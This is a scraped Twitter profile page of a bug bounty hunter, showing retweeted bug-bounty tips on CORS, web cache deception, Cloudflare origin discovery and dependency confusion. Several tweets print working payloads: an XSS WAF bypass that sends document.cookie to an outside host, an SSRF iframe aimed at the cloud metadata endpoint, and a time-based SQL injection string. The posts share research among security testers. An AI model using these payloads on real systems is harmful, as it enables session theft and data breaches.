๐”ธ๐•ช๐•š๐•ฃ๐•’๐•— โ„๐•’๐•™๐•ž๐•’๐•Ÿ (@mahfujwhh) 's Twitter Profile
๐”ธ๐•ช๐•š๐•ฃ๐•’๐•— โ„๐•’๐•™๐•ž๐•’๐•Ÿ

@mahfujwhh

แด„สส™แด‡ส€ ๊œฑแด‡แด„แดœส€ษชแด›ส ส€แด‡๊œฑแด‡แด€ส€แด„สœแด‡ส€ แด€แด› สœแด€แด„แด‹แด‡ส€แดษดแด‡ | ส™แดœษข ส™แดแดœษดแด›ส สœแดœษดแด›แด‡ส€

ID: 1487292568421371906

calendar_today29-01-2022 05:12:58

1,1K Tweet

1,1K Takipรงi

152 Takip Edilen

Intigriti (@intigriti) 's Twitter Profile Photo

Automating CORS vulnerabilities can sometimes be quite easy: ๐Ÿ˜Ž 1. Discover subdomains using OWASP Amass/Subfinder 2. Run list with Corsy: $ corsy -i ./targets.txt 3. Look for authenticated endpoints on the host that disclose sensitive data to craft a proof of concept ๐Ÿ”—

Automating CORS vulnerabilities can sometimes be quite easy: ๐Ÿ˜Ž 
1. Discover subdomains using OWASP Amass/Subfinder
2. Run list with Corsy: $ corsy -i ./targets.txt
3. Look for authenticated endpoints on the host that disclose sensitive data to craft a proof of concept

๐Ÿ”—
Godfather Orwa ๐Ÿ‡ฏ๐Ÿ‡ด (@godfatherorwa) 's Twitter Profile Photo

Slides of the talk in #PHDays PT Security docs.google.com/presentation/dโ€ฆ hoping be very helpful for all of you โ™ฅ #bugbounty #bugbountytips #bugbountytip If you didn't check the video of the talk , then its time ===>

c0dejump (@c0dejump) 's Twitter Profile Photo

First bounty from Intigriti ! - Vuln: web cache deception - Tool: github.com/c0dejump/wcDetโ€ฆ HF ! #BugBounty #intigriti

First bounty from Intigriti ! 
- Vuln: web cache deception
- Tool: github.com/c0dejump/wcDetโ€ฆ

HF !
#BugBounty #intigriti
Meowsint (@meowsint62) 's Twitter Profile Photo

Punycode 0 click ATO is crazy ๐Ÿ”ฅ๐Ÿ”ฅ Many thanks to Coffin for covering AmirMohammad Safari's article and explained very well with practical i do recommend to watch his video on YT. Intigriti and their triage team is so nice โค๏ธ (Severity changed from critical to high) Reason: 2FA

Punycode 0 click ATO is crazy ๐Ÿ”ฅ๐Ÿ”ฅ

Many thanks to <a href="/coffinxp7/">Coffin</a> for covering <a href="/AmirMSafari/">AmirMohammad Safari</a>'s article and explained very well with practical i do recommend to watch his video on YT.
<a href="/intigriti/">Intigriti</a> and their triage team is so nice โค๏ธ

(Severity changed from critical to high)
Reason: 2FA
slonser (@slonser_) 's Twitter Profile Photo

My new research Escalation of Self-XSS to XSS using modern browser capabilities. blog.slonser.info/posts/make-selโ€ฆ

A.Mugh33ra๐Ÿ‡ต๐Ÿ‡ฐโค๏ธ๐Ÿ‡ต๐Ÿ‡ธ (@mugh33ra) 's Twitter Profile Photo

Extracted 106 juicy Endpoints from single js file with Endpwn๐Ÿ‘Œ #BugBounty #hackerone #idor #sqlinjection #bugbountytip #xss #injection #privateinvitation #owasp

Extracted 106 juicy Endpoints from single js file with Endpwn๐Ÿ‘Œ
#BugBounty #hackerone #idor #sqlinjection #bugbountytip #xss #injection #privateinvitation #owasp
๐ฐš๐ฐผ๐ฐ‡๐ฑ… (@ynsmroztas) 's Twitter Profile Photo

I wrote a simple tool for Globalprotect (Pan-OS) vpn Reflected XSS, you can find it here ๐Ÿ”ฅ๐Ÿ”ฅ #github github.com/ynsmroztas/-CVโ€ฆ #BugBounty #bugbountytips

I wrote a simple tool for Globalprotect (Pan-OS) vpn Reflected XSS, you can find it here
๐Ÿ”ฅ๐Ÿ”ฅ
#github github.com/ynsmroztas/-CVโ€ฆ

#BugBounty 
#bugbountytips
Mohamed Elkhayat (@mohamed87khayat) 's Twitter Profile Photo

The endpoint was : /storage/users.csv Also try more endpoints like /storage/orders.csv /storage/transactions.csv /storage/reports.csv /storage/customers.csv /storage/backups/users_backup.csv /storage/tables/profiles.csv /storage/tables/roles.csv /storage/tables/invoices.csv

The endpoint was :
 /storage/users.csv

Also try more endpoints like

/storage/orders.csv
/storage/transactions.csv
/storage/reports.csv
/storage/customers.csv
/storage/backups/users_backup.csv
/storage/tables/profiles.csv
/storage/tables/roles.csv
/storage/tables/invoices.csv
Intigriti (@intigriti) 's Twitter Profile Photo

CF-Hero is a simple tool that helps you discover the origin IP of Cloudflare-protected servers using multiple sources! ๐Ÿ˜Ž ๐Ÿ”— github.com/musana/CF-Hero

CF-Hero is a simple tool that helps you discover the origin IP of Cloudflare-protected servers using multiple sources! ๐Ÿ˜Ž
 
๐Ÿ”— github.com/musana/CF-Hero
Godfather Orwa ๐Ÿ‡ฏ๐Ÿ‡ด (@godfatherorwa) 's Twitter Profile Photo

#Bugbountytip #bugbountytips Install JS Miner extension over Burp After crawling all endpoints Click on the target ==> Extensions > Js Miner > Run All Passive scans I got a result [Js Miner] Dependency Confusion The package is unclaimed over NPM Next step Create an account

#Bugbountytip #bugbountytips

Install JS Miner extension over Burp
After crawling all endpoints 
Click on the target ==&gt; Extensions &gt; Js Miner &gt; Run All Passive scans

I got a result [Js Miner] Dependency Confusion

The package is unclaimed over NPM 
Next step

Create an account
Mehdi (@silentgh00st) 's Twitter Profile Photo

#bugbountytip Quick tip and script : โœ…๏ธ If you are hunting or scanning a WordPress instance, don't forget to look for exposed plugins' or WP core REST endpoints, under /wp-json.. many plugins like payments gateways are exposing the webhooks or callback plugins in order to

#bugbountytip 
Quick tip and script : โœ…๏ธ

If you are hunting or scanning a WordPress instance, don't forget to look for exposed plugins' or WP core REST endpoints, under /wp-json.. many plugins like payments gateways are exposing the webhooks or callback plugins in order to
N$ (@nav1n0x) 's Twitter Profile Photo

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty
Mohsin Khan ๐Ÿ‡ฎ๐Ÿ‡ณ (@tabaahi_) 's Twitter Profile Photo

If you find hosts like dev, stage, or panel that are only accessible to admin users, try fuzzing to discover hidden endpoints. Also, read the JavaScript files you might find a signup endpoint or an API key that can help you create a user and gain access to the panel.

If you find hosts like dev, stage, or panel that are only accessible to admin users, try fuzzing to discover hidden endpoints. Also, read the JavaScript files you might find a signup endpoint or an API key that can help you create a user and gain access to the panel.
Ahmed Tarek (@0x_xnum) 's Twitter Profile Photo

I earned $1000 for my submission on @bugcrowd #ItTakesACrowd #bugbounty Tip: If a site generates a custom PDF using user input, test for HTML injection. If it works, try SSRF via an iframe to read metadata files: <iframe src="http://169.254.169.254/latest/meta-data/"></iframe>

I earned $1000 for my submission on @bugcrowd
#ItTakesACrowd #bugbounty

Tip:
If a site generates a custom PDF using user input, test for HTML injection.

If it works, try SSRF via an iframe to read metadata files:

&lt;iframe src="http://169.254.169.254/latest/meta-data/"&gt;&lt;/iframe&gt;
Shivang Maurya (@shivangmauryaa) 's Twitter Profile Photo

Bounty : 1200$ Bug : Time Based SQLi Payload : 1'XOR(94102*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 1. found a POST request on endpoint ย POST /Account 2. in that there was a Code parameter 3. Code=1'XOR(94102*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 4. injected this payload

Bounty : 1200$
Bug : Time Based SQLi 
Payload : 1'XOR(94102*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z

1. found a POST request on endpoint ย POST /Account
2. in that there was a Code parameter 
3. Code=1'XOR(94102*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
4. injected this payload